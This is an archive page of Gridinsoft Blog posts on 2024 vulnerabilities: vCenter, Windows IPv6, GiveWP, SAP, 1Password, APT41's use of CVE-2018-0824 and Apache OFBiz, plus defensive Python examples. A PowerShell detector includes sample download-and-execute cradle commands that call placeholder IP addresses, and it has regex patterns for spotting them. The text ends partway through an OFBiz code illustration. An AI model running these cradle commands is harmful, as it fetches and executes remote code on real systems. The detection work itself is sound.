vulnerability Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Critical VMWare vCenter Server RCE Vulnerability Fixed
Wed, 18 Sep 2024 14:06:14 +0000

On Tuesday, September 17, Broadcom released a security update that fixes a critical remote code execution flaw in VMWare vCenter Server software. Disclosed alongside the patch, the flaw carries a CVSS score of 9.8, reflecting how severe the consequences of exploitation can be. The company offers no workarounds; the only remedy is installing the latest security update.

VMWare vCenter Server RCE Vulnerability Disclosed

With the latest update for vCenter Server, Broadcom, the parent company of VMWare, released fixes for two vulnerabilities in this software. The more severe of the two, CVE-2024-38812, is a remote code execution flaw in the local implementation of a remote procedure call (RPC) protocol. More specifically, the vulnerability is classified as CWE-122, a heap-based buffer overflow.

[Image: Official Broadcom notification about the flaw]

By sending a specially crafted network packet, adversaries can overflow a heap buffer in the program and, in turn, force it to execute code of their choosing. Such a flaw can circumvent both the program’s own security policies and, in quite a few cases, stand-alone security solutions: since vCenter Server is a well-known and trusted piece of software, security vendors do not scrutinize it too thoroughly. Another VMWare product, the Cloud Foundation suite, contains the same flaw.

A vulnerability in virtualization software like vCenter can hit pretty badly, especially when the virtualized environments are connected directly to the rest of the enterprise network. Even when everything is set up correctly, spyware or a backdoor can create quite a mess inside the infected virtual machine. Worse still is the possibility of lateral movement and deployment of other malicious programs with that same malware. Sooner or later, attackers will find their way to the “mainland” network should the vulnerability remain unpatched.

Another Flaw of vCenter Server

The heap overflow RCE is not the only weakness that Broadcom has fixed in this update. Another, slightly less severe flaw, tracked as CVE-2024-38813, allows attackers to escalate privileges to root level. As with the previous flaw, all an attacker needs is a specially crafted network packet sent to the vCenter environment. That ease of exploitation accounts for its high CVSS score of 7.5, while the flaw’s other properties are less severe.

As the virtualized environment has little to no connection to actual hardware, root-level privileges won’t give any more access than what the VM settings allow. So unlike with the RCE flaw, adversaries will not be able to use this vulnerability for initial access or lateral movement. At the same time, it may be pretty useful as an auxiliary tool: high privileges are always usable in any attack scenario.

Mitigation and Patches

As I’ve mentioned in the introduction, Broadcom does not offer any fix for the vulnerabilities other than installing the update. That is unfortunate, as updating all of the virtualized infrastructure may turn out to be a rather tedious task. But the deep nature of both vulnerabilities means there’s not much one can do on their own, except for isolating the environment from external network connections.

List of vulnerable and fixed software versions

Software                   Versions vulnerable    Fixed in
vCenter Server             all 8.0 and 7.0        8.0 U3b, 7.0 U3s
VMware Cloud Foundation    all 4.x and 5.x        Async patch to 8.0 U3b / 7.0 U3s

Top 3 Vulnerabilities of 2024: How to Block and Prevent
Sun, 15 Sep 2024 18:14:59 +0000

Any successful remote cyberattack starts with penetration of the target network. Regardless of the type of threat (spyware, ransomware, or infostealer), first it must be delivered before it can be deployed. Attackers use a variety of methods and tools to accomplish this. Some of them require some action on the part of the individual. Others, in turn, rely on vulnerabilities in the system and can be delivered and deployed without the victim’s involvement.

Top Vulnerabilities in 2024

Of the many vulnerabilities that surfaced in the first 8 months of 2024, several created significant fuss in the cybersecurity community. The key sign of significance is, of course, the number of systems that may be impacted. Still, I won’t ignore other factors, like ease of exploitation and the severity of possible consequences.

[Image: How do vulnerabilities work?]

There may also be confusion about whether a flaw should be considered “top” or not depending on how frequently it is exploited in cyberattacks. As some flaws keep circulating years after their initial discovery, you can sometimes see ratings that include those “past” vulnerabilities. For certain years, these overdue weaknesses were dominant despite all the vulnerabilities discovered the same year. In this article, I will concentrate exclusively on ones discovered in 2024, with all the other characteristics mentioned above in mind.

Critical RCE Threat in Windows TCP/IP Stack

CVE-2024-38063 is a critical vulnerability in Windows 10/11 that allows remote code execution (RCE) via IPv6 packets. The vulnerability is rated CVSS 9.8 and affects Windows 10, Windows 11 and Windows Server 2008-2022. Security researcher Marcus Hutchins has published a detailed analysis of the vulnerability. He also noted that this vulnerability affects one of the most exposed parts of the Windows kernel, the tcpip.sys driver, which is responsible for processing TCP/IP packets. In other words, attackers can exploit this vulnerability by sending specially crafted IPv6 packets to the target machine, allowing RCE without user interaction.

As for potential risks: if successful, attackers could gain access at the SYSTEM level. This eventually allows them to execute arbitrary code on the vulnerable system and compromise sensitive data. The former, in turn, is a classic way to deploy malware in cyberattacks of various kinds. Microsoft has released the update and strongly recommends applying it as soon as possible. For those who cannot apply the patch, Redmond recommends disabling IPv6 until the update becomes available, in order to reduce the attack surface.

Fortunately, no exploitation cases were known at the time of writing. But the fact that the vulnerability exposes individual users and corporations alike makes it worth keeping in mind and fixing when the opportunity arises.

Critical Remote Code Execution in Microsoft Project

CVE-2024-38189 is a critical remote code execution vulnerability that affects several Microsoft products: Windows 10 and Windows Server 2019 and later, as well as various versions of Office, including Office 365. Its CVSS score of 8.8 clearly characterizes how much damage attackers can do with this flaw. Unlike the previous vulnerability, exploiting CVE-2024-38189 requires user interaction, namely the attacker must convince the victim to open a specially crafted Microsoft Project file. However, in the era of Dark LLM-generated phishing emails, this is not a problem for attackers.

The results of successful exploitation of this vulnerability are clear: remote access with privilege escalation. It can lead to data leakage and full control over the infected system, with potentially severe consequences. Microsoft has released an update, so the only task for users is to apply it and keep an eye out for suspicious network activity. And with the vulnerability being actively exploited in the wild, there is no reason to delay this update.

RCE Flaw in Microsoft Exchange

The third vulnerability is CVE-2024-38178, which has a CVSS score of 7.5 and allows remote code execution under certain conditions. Although this is a rather specific vulnerability, it poses a significant threat. Similar to the previous one, exploitation requires an authenticated client to be tricked into clicking a malicious link. Moreover, exploitation also requires the victim to use Microsoft Edge in Internet Explorer mode. Nevertheless, South Korea’s National Cyber Security Center has reported that this vulnerability was potentially used in a state-sponsored APT attack.

The vulnerability arises from a flaw in web content processing, leading to remote code execution. This could result in unauthorized server control, data leaks, and significant server disruption. The attacker does not require direct access to the server, relying instead on tricking users. To ensure security, users should update their systems and consider disabling Internet Explorer mode in Microsoft Edge.

What Causes the Vulnerabilities to Appear?

Typical reasons for vulnerabilities to appear in programs are bad software engineering, technology aging, software misuse, or all of them together. It is hard to trace the reason for each and every specific vulnerability, especially considering the sheer number of them. But it is obvious that the more complex a program is, the easier it is for something inside to break, or be broken on purpose.

[Image: Windows update. Make sure your system is up to date]

The worst part about it is that you can’t really do anything to prevent the vulnerabilities from appearing (if you are not the developer of course). For users, and even corporations, the only way to secure themselves against negative consequences of vulnerability exploitation is to install all the recent updates. And even this won’t always be a guarantee of having no zero-day flaws.

How to prevent vulnerabilities?

To summarize, let me make a few recommendations to help reduce the likelihood of successful exploitation of vulnerabilities:

  • Install the latest updates. Proper software developers release flaw fixes as part of their regular updates, and I strongly recommend not ignoring them. If you happen to use an end-of-service program, it is better to update to the newest version or seek an alternative that still receives software updates. “Unsupported” does not mean “free of vulnerabilities”!
  • Use software from reliable developers. While vulnerabilities can appear in any software from any developer, the likelihood of this happening is much higher when you stick to solutions from a no-name dev team. Large and renowned developers, aside from doing thorough testing, will also provide all the needed support and updates for their software.
  • Keep an eye on security news. Companies sometimes struggle with notifying their users in a timely manner. By checking out newsletters, you make sure you are up to date on the recent flaws or attacks.

Critical RCE Vulnerability in GiveWP WordPress Plugin
Wed, 21 Aug 2024 16:28:57 +0000

A critical vulnerability has been discovered in the GiveWP WordPress plugin that leaves thousands of websites exposed. The vulnerability is of high severity and allows taking control of the entire affected website without any authentication. A fix is currently available to address this vulnerability, so users should update as soon as possible.

Critical RCE vulnerability affects thousands of WordPress sites

A cybersecurity researcher has recently discovered a critical vulnerability tracked as CVE-2024-5932. It has a CVSS score of 10.0 (the maximum possible) and puts more than 100,000 WordPress sites running GiveWP plugin version 3.14.1 and earlier at serious risk. The issue is a PHP Object Injection (POI) vulnerability in the GiveWP plugin, which is widely used by donation and fundraising platforms. The vulnerability is exploited through deserialization of untrusted data, in particular via the ‘give_title’ parameter: attackers can inject a maliciously crafted PHP object, and when combined with an existing object-oriented programming (OOP) chain in the plugin, this leads to full remote code execution (RCE).

[Image: CVE-2024-5932 vulnerability, from X]

In addition to remote code execution (RCE), this vulnerability allows for unauthorized file deletion without any authentication. In practice, this may allow attackers to gain full control over the affected WordPress site by deleting critical files from the server. Given the role of the plugin in managing financial transactions and sensitive donor information, the consequences of such an exploit are exceptionally serious.

Detection And Response

A security researcher nicknamed villu164 discovered the vulnerability on May 26, 2024, and reported it through the Wordfence Bug Bounty Program. On June 13, 2024, Wordfence notified the plugin developer of the vulnerability but received no feedback. On July 6, 2024, the company informed the WordPress.org team. A month later, on August 7, 2024, the developer released a fully patched version, 3.14.2. Fortunately, there are currently no reports or evidence that the vulnerability has been exploited in the wild. But as usually happens, exploitation will inevitably follow the public disclosure of the flaw.

As the plugin is described on its official website, GiveWP is the highest-rated, most downloaded, and best-supported donation plugin for WordPress. With GiveWP, users accept gifts for charity or other purposes through customizable donation forms. The plugin also allows you to view donor data and fundraising reports, manage donors, and integrate with various third-party gateways and services. In other words, the site handles money and the people involved. It’s no surprise that the flaw scored 10/10 on the CVSS scale: both the ease of exploitation and the amount of data it can expose are nothing to mess around with.

Recommendations

To protect their WordPress site, site owners should update the plugin to 3.14.2. Since there is no workaround available, websites running older versions remain highly vulnerable to exploitation, especially now that the vulnerability has been made public.

Still, a proactive approach towards picking plugins is a must. Even well-known plugins may be vulnerable, let alone no-name plugins that were posted 2 years ago and never updated since. Tricks like typosquatting or supply chain attacks are applicable here as well, so stay updated on the latest WP security news.

Google Pixel Devices Shipped with Vulnerable App
Fri, 16 Aug 2024 18:41:04 +0000

Recent research has uncovered a vulnerable app in the Android package on a large number of Google Pixel smartphones. Devices shipped worldwide since September 2017 may be susceptible to malware deployment by malicious actors. The issue is linked to a pre-installed app called “Showcase.apk”, used primarily on showroom devices.

Google Pixel Phones Contain a Vulnerable Pre-Installed App

According to a recent report, Google Pixel devices shipped globally since September 2017 contain a severe vulnerability lurking within a pre-installed app. The application in question, Showcase.apk, can potentially expose millions of users to significant security risks. Researchers at iVerify discovered that this app has excessive system privileges, which enable it to remotely execute code and install arbitrary packages on the device.

Experts from other companies, including Palantir Technologies and Trail of Bits, state that the app poses considerable security risks for several reasons. First, it downloads a configuration file over an unprotected HTTP connection, leaving the file open to tampering; this is what allows attackers to execute code at the system level. The configuration file is downloaded from a single U.S.-based domain hosted on AWS, which further exacerbates the vulnerability. Also, the app is granted excessive privileges, which could have negative implications in certain scenarios, as discussed below.

Potential Exploitation Risks

The APK in question installs the Verizon Retail Demo Mode (“com.customermobile.preload.vzw”), a program developed by Smith Micro, a company specializing in enterprise software. In short, this app is designed to switch devices into a showroom mode: it puts phones into demo mode and disables certain features to prevent tampering or locking. The app requires nearly three dozen different permissions, including access to location and external storage. While the program itself is not inherently malicious (many companies use similar functionality), its implementation is somewhat different.

The main issue is that the app’s use of an unencrypted HTTP connection makes it vulnerable to “man-in-the-middle” (MitM) attacks. This could allow attackers to eavesdrop on the transferred data and inject their own packets on the fly, which obviously opens the door to malicious code or spyware being installed on the attacked device.

The good news is that the app is not enabled by default, meaning there is no attack surface unless it is activated. Despite the potential for abuse, there is currently no evidence that this vulnerability has been exploited in the wild. On the other hand, the app’s deep integration into the system firmware means users cannot uninstall it. At the same time, it could be activated if a threat actor gains physical access to the device and enables developer mode. Another case where the phone may be vulnerable “out of the box” is when one purchases a showroom stock device: large retailers often offer them at a nice discount, at times at the price of a used smartphone.

Google’s Response

Google responded to the research findings by stating that the vulnerability is not related to the Android platform or Pixel devices but rather to a package specifically developed for Verizon demo devices in stores. Additionally, Google emphasized that exploiting this app would require both physical access to the device and the user’s password. The company also noted that the app is not present on the latest Pixel 9 series devices and confirmed that it will be removed from all supported Pixel devices in a future software update. Showroom devices may need this software (or its equivalents) installed manually.

Critical Windows TCP/IP Vulnerability Uncovered, Patch Now
Thu, 15 Aug 2024 19:16:11 +0000

A critical vulnerability has been discovered in the Windows TCP/IP stack that allows unauthenticated remote code execution (RCE). The vulnerability can be exploited remotely by sending specially crafted IPv6 packets to the target system. Successful exploitation could allow an attacker to execute arbitrary code on the target system, and the flaw affects all supported versions of Windows and Windows Server.

Windows TCP/IP RCE Vulnerability Impacts All Systems with IPv6 Enabled

Researcher XiaoWei from Kunlun Lab has reported the discovery of a critical remote code execution vulnerability in the Windows TCP/IP stack. The vulnerability, identified as CVE-2024-38063, carries a CVSS score of 9.8 and can be exploited without user interaction (zero-click). While details are scarce at the time of writing, it is known that an attacker can send IPv6 packets containing specially crafted payloads to the target system. CVE-2024-38063 affects all supported versions of Windows 10, 11, and Windows Server. It should be explicitly noted that the issue affects only IPv6 users, as it is impossible to send the said crafted v6 packets to an IPv4 address.

“Considering its harm, I will not disclose more details in the short term… The bug triggers before firewall handling the packet”.

Still, the research reveals that CVE-2024-38063 leads to a buffer overflow. As a result, it allows an attacker to execute arbitrary code at the SYSTEM privilege level on the target system, which could result in full control over the compromised system. I expect to see more details as time goes on and the patch is installed on more systems, so the researcher can release the info with less risk.

The impact of such a vulnerability could have been tremendous had Microsoft decided to ignore it or simply missed it altogether. These days, IPv6 is not that widespread, but experts around the world consider it to be the future of the Internet. Now imagine hackers being able to deploy malware to any device, at any time, without any user interaction. This is what could have happened had this flaw appeared a decade later, after the global rollout of IPv6.

Microsoft’s Response and Mitigation

Microsoft noted that this is not the first vulnerability of this kind, and attackers have actively exploited previous ones. The company anticipates that attackers will eventually develop exploits to take advantage of this vulnerability. Fortunately, Microsoft already offers a fix in the form of its latest, August 2024 Patch Tuesday update. Additionally, organizations are advised to monitor network activity and implement network segmentation. These measures are intended to limit lateral movement of the threat in the event of a system compromise.

Microsoft also suggested a temporary workaround involving the disabling of the IPv6 protocol. However, the issue lies in the fact that IPv6 is enabled by default on most systems, and some Windows components rely on it. Disabling IPv6 could, therefore, disrupt the functionality of other Windows components.

Critical SAP Auth Bypass and SSRF Flaws Fixed, Update Now
Wed, 14 Aug 2024 14:30:31 +0000

SAP, the developer of business management software, released a huge security update that fixes numerous vulnerabilities in its software. Among them are severe authentication bypass and server-side request forgery vulnerabilities rated at CVSS 9.8 and 9.1 respectively. The company urges installing the updates as soon as possible, as the mentioned flaws affect a substantial number of customers.

SAP Uncovers Auth Bypass and Request Forgery Vulnerabilities

In its latest update, released on August 13, 2024, SAP disclosed fixing 17 security flaws, 6 of which are considered critical. Only two of them, however, drew most of the attention of security researchers: CVE-2024-41730 and CVE-2024-29415. And for a good reason: both have CVSS ratings of 9+ and may lead to painful consequences if exploited by adversaries.

[Image: Update notes for the August 2024 security update from SAP]

The first, CVE-2024-41730, is an authentication bypass vulnerability that allows adversaries to extract logon tokens for the SAP Business Intelligence Platform. It has a prerequisite: the system must have Single Sign On (SSO) enabled for Enterprise authentication. Though, as it is pretty common to see this setting enabled, it should not be much of an obstacle. And having the auth token for the application effectively means taking it over, with the potential for data leaks and/or malware deployment.

The CVE-2024-29415 flaw, if successfully exploited, may cause server-side request forgery (SSRF). The software fails to interpret some IP addresses correctly, treating localhost (127.0.0.1) and similar addresses as globally routable. In simple words, hackers can command the server to connect to an arbitrary IP address, ignoring its current security configuration. Such a trick can result in massive data leaks and infrastructure exposure. It is also worth noting that the flaw likely stems from an incorrect fix of the previous similar vulnerability, CVE-2023-42282.
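As an added example (not SAP’s code and not from the advisory), the Python below shows the defender’s side of the address-interpretation problem just described: a constructed naive prefix check next to a strict classifier built on the standard ipaddress module, which rejects non-canonical spellings such as "127.1" or "0x7f.0.0.1" and unwraps IPv4-mapped IPv6 ("::ffff:127.0.0.1") before deciding whether a destination is internal. All addresses are constructed samples.

```python
import ipaddress
from typing import Iterable, Tuple

# Constructed illustration of the weak pattern (NOT SAP's code): deciding
# "is this internal?" by matching a few well-known spellings. "::ffff:127.0.0.1",
# "0x7f.0.0.1" and "127.1" all slip past it, which is the kind of
# misinterpretation the advisory describes.
BLOCKED_PREFIXES = ("127.", "10.", "192.168.", "169.254.", "::1", "0.")


def naive_is_public(raw: str) -> bool:
    return not raw.startswith(BLOCKED_PREFIXES)


def _effective_address(addr):
    """Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so the embedded IPv4 address is
    what gets classified. Older ipaddress versions report such addresses as
    neither loopback nor private, so the unwrap has to be explicit."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr


def classify_address(raw: str) -> Tuple[bool, str]:
    """Return (allowed, reason) for a destination the server is asked to reach.

    Only canonical literals are accepted. Shorthand ("127.1"), hexadecimal
    ("0x7f.0.0.1") and zero-padded octets ("0177.0.0.1") are rejected outright:
    libc's inet_aton accepts all of them as loopback, so a validator that reads
    them as "not 127.0.0.1" is bypassed by whichever component resolves them.
    """
    text = raw.strip()
    if text.startswith("[") and text.endswith("]"):
        text = text[1:-1]  # bracketed IPv6 literal, as written inside a URL
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return False, "not a canonical IP literal"
    addr = _effective_address(addr)
    if addr.is_loopback:
        return False, "loopback"
    if addr.is_unspecified:
        return False, "unspecified (0.0.0.0 / ::)"
    if addr.is_link_local:
        return False, "link-local (169.254.0.0/16 also hosts cloud metadata services)"
    if addr.is_multicast:
        return False, "multicast"
    if addr.is_private:
        return False, "private / non-routable"
    if addr.is_reserved or not addr.is_global:
        return False, "not globally routable"
    return True, "public"


def all_resolved_allowed(addresses: Iterable[str]) -> bool:
    """A hostname can resolve to several records. Every one of them must pass;
    otherwise a name that answers with a public address first and 127.0.0.1
    second still steers the connection inside. An empty answer is refused."""
    addresses = list(addresses)
    return bool(addresses) and all(classify_address(a)[0] for a in addresses)


if __name__ == "__main__":
    # Constructed sample destinations (not taken from the advisory).
    for sample in ("8.8.8.8", "127.0.0.1", "::ffff:127.0.0.1", "127.1",
                   "0x7f.0.0.1", "169.254.169.254", "[::1]"):
        print(f"{sample:>18}  naive={naive_is_public(sample)!s:5}  "
              f"strict={classify_address(sample)}")
```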

List of critical flaws that SAP fixed in the August 2024 patch

Vulnerability      Severity Score
CVE-2024-41730     9.8
CVE-2024-29415     9.1
CVE-2024-42374     8.2
CVE-2023-30533     7.8
CVE-2024-34688     7.5
CVE-2024-33003     7.4

SAP Critical Vulnerabilities – Patches Available

Fortunately for the massive customer base of SAP products, the fixes are available right away. The company likely acknowledged the vulnerabilities quite some time ago but never disclosed them publicly before having a proper fix. The list of software and versions that contain the fix is exceptionally long, so if you use SAP, consider checking for updates and installing them right away.

Obviously, with such a large number of fixes, the company does not offer any mitigation instructions. Sure enough, one could suggest disabling SSO for Enterprise authentication, but that is a less than favorable option. And overall, mitigations are only good when a proper solution is absent, but in this case it is already there.

1Password Vulnerability for MacOS Causes Credentials Leak
Fri, 09 Aug 2024 12:06:08 +0000

    A critical vulnerability was discovered in 1Password that allows attackers to steal vault items by bypassing the app’s security measures. It affects only the macOS version of the program, and touches every single version of the app. A patch is now available, and users are strongly advised to update as soon as possible.

    1Password Vulnerability Let Attackers Exfiltrate Vault Items

    1Password developers reported a critical vulnerability found in the Mac version of the app. This vulnerability, identified as CVE-2024-42219, was discovered by Robinhood’s Red Team during an independent security assessment of 1Password for Mac. It allows a malicious process running locally on a computer to bypass protections for inter-process communication. This issue affects all app versions up to 8.10.36.

On macOS, 1Password uses the system-native XPC interface for inter-process communication. XPC allows enforcing additional protections called the hardened runtime, which allows enforcing that processes you communicate with have additional protections from process tampering. This prevents certain local attacks from being possible. (1Password Support)

Vulnerabilities in password managers are always a massive headache for both developers and users. The recent events around the LastPass password manager, which ended in a huge leak of user vault data, are a perfect example of what can happen when such a case is not handled properly. Fortunately, 1Password fixed this issue before any in-the-wild exploitation was reported.

    Technical Details

CVE-2024-42219 concerns a bypass of inter-process communication (IPC) protections in 1Password for Mac, in all versions before 8.10.36. A malicious process running locally on the computer can circumvent these protections, which lets an attacker steal vault items and obtain the secrets needed to log into 1Password, such as the account unlock key and the SRP-x (Secure Remote Password) values. 1Password vaults are secure containers for storing and organizing items that also let users share specific information with selected people; essentially, they are mini password managers within the main application.

Certain conditions are required to exploit this vulnerability, however: the attacker must first convince the user to run malicious software on their computer. The attack then abuses the absence of specific macOS inter-process communication checks, which lets the malicious process spoof or hijack trusted 1Password integrations such as the browser extension or the command-line interface. Fortunately, there have been no reports of this vulnerability being exploited in the wild.

    1Password’s Response

1Password released an update to patch the vulnerability promptly after being notified. Details of the issue were published on news platforms only after the patch was out, which upset some users who expected to see it mentioned in the changelog. It is clear, however, that the company kept quiet to protect users until the fix was available.

    1Password strongly recommends that all users update their app to version 8.10.36 as soon as possible to mitigate potential risks. The company also expressed gratitude to Robinhood’s team for responsibly disclosing the vulnerability and for their close collaboration, which ensured timely protection for users.

Windows COM Vulnerability Exploited by Chinese Hackers https://gridinsoft.com/blogs/windows-com-vulnerability-exploited/ Wed, 07 Aug 2024 15:02:10 +0000

    The post Windows COM Vulnerability Exploited by Chinese Hackers appeared first on Gridinsoft Blog.

    A vulnerability in Windows COM, first discovered in 2018, has become the target of attacks once again. A Chinese hacker group, likely affiliated with the Ministry of State Security of the People’s Republic of China, has exploited this vulnerability in an attack on a research center in Taiwan. Microsoft offers a non-obvious solution to this problem.

    Chinese Cybercriminals Are Exploiting A Vulnerability In Windows 10

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2018-0824 to its Known Exploited Vulnerabilities catalog. This was prompted by a Cisco Talos report indicating that the Chinese group APT41 has actively used the flaw in its attacks. In short, the vulnerability allows local privilege escalation and remote code execution, putting the many Windows 10 systems that never received the patch at risk. APT41 built custom loaders that inject the CVE-2018-0824 exploit code directly into memory, which lets them take control of the system.

The remote code execution vulnerability CVE-2018-0824 has a CVSS score of 7.5 and exists in “Microsoft COM for Windows” when it fails to properly handle serialized objects; Microsoft titles it the “Microsoft COM for Windows Remote Code Execution Vulnerability.” It affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, and Windows 10 Server. An attacker exploiting it could use a specially crafted file or script to perform actions on the system. In an email attack, the attacker sends the file to the user and convinces them to open it; in a web-based attack, the attacker hosts a website containing the file and persuades the user to open it by clicking a link.

    CVE-2018-0824 and Threat Actors

The primary threat actor known to exploit this vulnerability is APT41, a cyber group that, according to the U.S. government, consists of Chinese nationals. In August 2023, researchers detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts inside the environment of a Taiwanese government-affiliated research institute. The attack, attributed to APT41, used a custom Cobalt Strike loader written in Go to evade detection. The operators were proficient in simplified Chinese, which points to their likely origin.
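The behaviour Talos describes, a PowerShell command reaching out to a bare IP address to download and execute a script, is simple to hunt for in script block logs. The Python below is an added example written for this post, not code from Talos, Microsoft or Gridinsoft; the log lines are constructed in the shape of Event ID 4104 records, and the regular expressions and severity labels are this example's own choices. It also decodes -EncodedCommand arguments, which is where such cradles usually hide.

```python
"""
Flag PowerShell download-and-execute cradles that fetch from a raw IP address.
Input is a list of constructed script block log lines; nothing here is real telemetry.
"""
import base64
import re

# Constructed: a cradle hidden behind -EncodedCommand (base64 of UTF-16LE text).
_ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.25/b.ps1')"
    .encode("utf-16le")
).decode()

SAMPLE_LOG = [
    "2023-08-14T09:12:51Z host=ws01 id=4104 ScriptBlockText=Get-ChildItem C:\\Users\\alice\\Documents",
    "2023-08-14T09:13:07Z host=ws01 id=4104 ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.25/update.ps1')",
    "2023-08-14T09:13:09Z host=ws01 id=4104 ScriptBlockText=Invoke-WebRequest -Uri https://packages.example.com/tool.ps1 -OutFile t.ps1",
    "2023-08-14T09:14:00Z host=ws02 id=4104 ScriptBlockText=powershell -nop -w hidden -c \"iwr http://198.51.100.7:8080/a -UseBasicParsing | iex\"",
    f"2023-08-14T09:14:30Z host=ws02 id=4104 ScriptBlockText=powershell.exe -NoP -EncodedCommand {_ENCODED_CRADLE}",
    "2023-08-14T09:15:30Z host=ws02 id=4104 ScriptBlockText=Write-Host 'ping 192.0.2.1 reachable'",
]

# Download primitives (cmdlets and their Windows PowerShell aliases), execution
# primitives, URLs whose host is an IPv4 literal, and -EncodedCommand arguments.
DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|Invoke-RestMethod"
    r"|Start-BitsTransfer|\b(?:iwr|irm|curl|wget)\b", re.I)
EXECUTE = re.compile(r"Invoke-Expression|\biex\b", re.I)
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(script):
    """Return the script plus the decoded text of any -EncodedCommand argument."""
    decoded = []
    for blob in ENCODED.findall(script):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 / not UTF-16: scan the raw text only
    return "\n".join([script, *decoded])


def classify(script):
    """Return (severity or None, sorted list of IP literals contacted)."""
    text = expand_encoded(script)
    ips = sorted(set(IP_URL.findall(text)))
    downloads = bool(DOWNLOAD.search(text))
    executes = bool(EXECUTE.search(text))
    if downloads and ips and executes:
        return "high", ips     # fetch from a bare IP and run it in memory: the reported cradle
    if downloads and ips:
        return "medium", ips   # fetch from a bare IP only; often staging, worth a look
    return None, ips


def scan(lines):
    """Run classify() over log lines and return the findings in log order."""
    findings = []
    for line in lines:
        meta, sep, script = line.partition(" ScriptBlockText=")
        if not sep:
            continue
        severity, ips = classify(script)
        if severity is None:
            continue
        host = re.search(r"\bhost=(\S+)", meta)
        findings.append({
            "time": meta.split(" ", 1)[0],
            "host": host.group(1) if host else "?",
            "severity": severity,
            "ips": ips,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run against the constructed lines, the scan returns three high findings (two plain cradles and the encoded one) and ignores the download from a named host and the harmless ping string. A URL with a hostname is deliberately not flagged on its own; the point of the rule is the bare IP, which legitimate update channels almost never use.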

Although it might seem that APT41 poses minimal risk to the average user, that is not entirely accurate. Another threat actor, targeting all Windows users, is highlighted in other reports. SnakeKeylogger, aka KrakenKeylogger, is a newer piece of malware aimed at Windows users, and not necessarily ones inside a corporate network. It logs keystrokes, steals credentials and takes screenshots to gather sensitive information, which it then sends to the attackers. It typically spreads through phishing campaigns, with the malicious code hidden in email attachments.

Available Solutions

Although a patch for CVE-2018-0824 has been available for years, attackers continue to exploit it, which means the systems they hit never received it. The first step is therefore the obvious one: install the 2018 security update that fixes CVE-2018-0824 on every Windows system still missing it. Meanwhile, SnakeKeylogger remains a significant threat to users. Here are several further ways to address these issues:

Upgrade to Windows 11. One radical solution for Windows 10 users is to upgrade to Windows 11. The significant problem is that many users are reluctant to switch: Windows 11 has higher system requirements, and not everyone can upgrade their hardware to support it. Many users therefore remain on Windows 10 despite the security warnings, because of resource limitations and an unwillingness to spend money on new equipment.

Use Advanced System Protection. There is also a workaround: blocking the attacks with advanced system protection. GridinSoft Anti-Malware is a program you can rely on for this. It stops malware from getting into the system before it can do any harm. While using an outdated version of Windows is not the best option, employing an advanced anti-malware program can significantly reduce the risk.

Apache OFBiz RCE Vulnerability Discovered, Patch Now https://gridinsoft.com/blogs/apache-ofbiz-rce-vulnerability/ Tue, 06 Aug 2024 13:14:57 +0000

    The post Apache OFBiz RCE Vulnerability Discovered, Patch Now appeared first on Gridinsoft Blog.

A vulnerability, CVE-2024-38856, has been discovered in Apache OFBiz that allows unauthenticated remote code execution. A patch is already available, and the developers strongly recommend installing it, as attackers will not hesitate to exploit the issue now that it is public. Considering the high CVSS score of the flaw, little more motivation should be needed.

    Critical Apache OFBiz Flaw Allows Unauthorized Code Execution

Cybersecurity researchers have discovered a critical zero-day vulnerability in Apache OFBiz. The authorization flaw, tracked as CVE-2024-38856, has a CVSS score of 9.8 and affects versions through 18.12.14. Successful exploitation allows attackers to execute arbitrary code on vulnerable systems without authentication.

CVE-2024-38856 exploit request in version 18.12.14 (Source: SonicWall)

Apache OFBiz is an open-source enterprise resource planning (ERP) framework. It includes web applications covering common business needs such as accounting, human resources, inventory management, customer relationship management and marketing. Companies such as United Airlines, Atlassian JIRA, HP Development Company and Upwork Global Inc., among roughly 170 others, use it, and organizations running it have been advised to address this critical vulnerability promptly.

    CVE-2024-38856 Overview

During analysis, researchers observed that, under certain conditions, an attacker could gain control of the system and trigger screen rendering code without proper authentication. The issue stems from parts of the system failing to verify authentication correctly, which allows unauthorized access to specific components. At the root of it, the application performs no authentication check of its own for the command; it relies on the per-endpoint configuration instead, so any endpoint whose configuration does not demand authentication is reachable by anyone.
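What “relying on endpoint configuration” looks like, and what the alternative is, is easier to see in code. The Python below is an added illustration written for this post; it is not Apache OFBiz’s code, and its request map, screen names and session format are made up for the example. It goes a step beyond the description above in also letting the URL pick the rendered screen in the weak version, a related habit with the same root cause (the auth decision is made on one name while the action is performed on another); that part is an assumption of the illustration.

```python
"""
Deny-by-default request dispatch versus trusting a per-endpoint auth flag.
Request map, screen names and session format are constructed for this example.
"""


class AuthRequired(Exception):
    """Raised when an unauthenticated caller hits a protected screen."""


class UnknownRequest(Exception):
    """Raised when a request name or screen is not in the map."""


# Constructed request map: each request name declares the screen it renders and,
# optionally, whether authentication is required. "exportData" has no "auth" flag
# at all, which is exactly the gap a per-endpoint model silently accepts.
REQUEST_MAP = {
    "login":           {"auth": False, "view": "LoginScreen"},
    "forgotPassword":  {"auth": False, "view": "ForgotPasswordScreen"},
    "viewOrders":      {"auth": True,  "view": "OrderListScreen"},
    "runReportScript": {"auth": True,  "view": "ScriptRunnerScreen"},  # renders by executing code
    "exportData":      {"view": "ExportScreen"},
}


def render(view):
    """Stand-in for the screen renderer; returns a marker instead of HTML."""
    return f"rendered:{view}"


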